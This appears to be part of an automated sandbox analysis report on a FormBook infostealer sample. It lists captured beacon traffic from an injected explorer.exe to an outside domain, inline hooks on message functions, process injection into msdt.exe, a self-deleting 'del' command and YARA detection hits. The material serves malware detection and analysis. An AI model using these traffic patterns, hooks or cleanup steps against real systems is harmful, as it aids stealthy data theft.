                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.649753111.221.46.4980C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 15:32:44.386287928 CET6388OUTGET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1
                                                                                      Host: www.tabandolano.online
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 15:32:44.603816986 CET6388INHTTP/1.1 302 Found
                                                                                      Date: Tue, 23 Feb 2021 14:32:44 GMT
                                                                                      Server: Apache
                                                                                      Location: http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk
                                                                                      Content-Length: 346
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 61 62 61 6e 64 6f 6c 61 6e 6f 2e 6f 6e 6c 69 6e 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 3f 56 52 4e 68 3d 43 73 6b 34 67 69 30 41 32 74 65 4f 48 63 68 4e 78 6c 48 6d 66 6b 33 73 5a 6b 4e 55 57 48 53 68 6b 54 36 44 73 4e 76 45 62 4f 65 43 49 36 47 39 44 47 64 31 6a 6a 52 79 4a 32 73 49 5a 33 72 51 44 6a 57 57 7a 55 77 79 62 77 3d 3d 26 61 6d 70 3b 6a 4c 30 38 6c 32 3d 57 58 4c 30 30 34 35 30 47 46 6f 48 6b 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&amp;jL08l2=WXL00450GFoHk">here</a>.</p></body></html>


                                                                                      Code Manipulations

                                                                                      User Modules

                                                                                      Hook Summary

                                                                                      Function NameHook TypeActive in Processes
                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                      GetMessageWINLINEexplorer.exe
                                                                                      GetMessageAINLINEexplorer.exe

                                                                                      Processes

                                                                                      Process: explorer.exe, Module: user32.dll
                                                                                      Function NameHook TypeNew Data
                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEA
                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEA
                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEA
                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEA

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: cryptedprof.exe PID: 6980 Parent PID: 5964

                                                                                      General

                                                                                      Start time:15:30:48
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Users\user\Desktop\cryptedprof.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\cryptedprof.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:339210 bytes
                                                                                      MD5 hash:72EFE20E4A59AE2722383B8786956994
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Analysis Process: cryptedprof.exe PID: 7064 Parent PID: 6980

                                                                                      General

                                                                                      Start time:15:30:48
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Users\user\Desktop\cryptedprof.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\cryptedprof.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:339210 bytes
                                                                                      MD5 hash:72EFE20E4A59AE2722383B8786956994
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Analysis Process: explorer.exe PID: 3440 Parent PID: 7064

                                                                                      General

                                                                                      Start time:15:30:54
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:
                                                                                      Imagebase:0x7ff6f22f0000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: msdt.exe PID: 984 Parent PID: 3440

                                                                                      General

                                                                                      Start time:15:31:15
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\SysWOW64\msdt.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                                      Imagebase:0x180000
                                                                                      File size:1508352 bytes
                                                                                      MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      Analysis Process: cmd.exe PID: 6592 Parent PID: 984

                                                                                      General

                                                                                      Start time:15:31:19
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del 'C:\Users\user\Desktop\cryptedprof.exe'
                                                                                      Imagebase:0x2a0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: conhost.exe PID: 6608 Parent PID: 6592

                                                                                      General

                                                                                      Start time:15:31:19
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff61de10000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >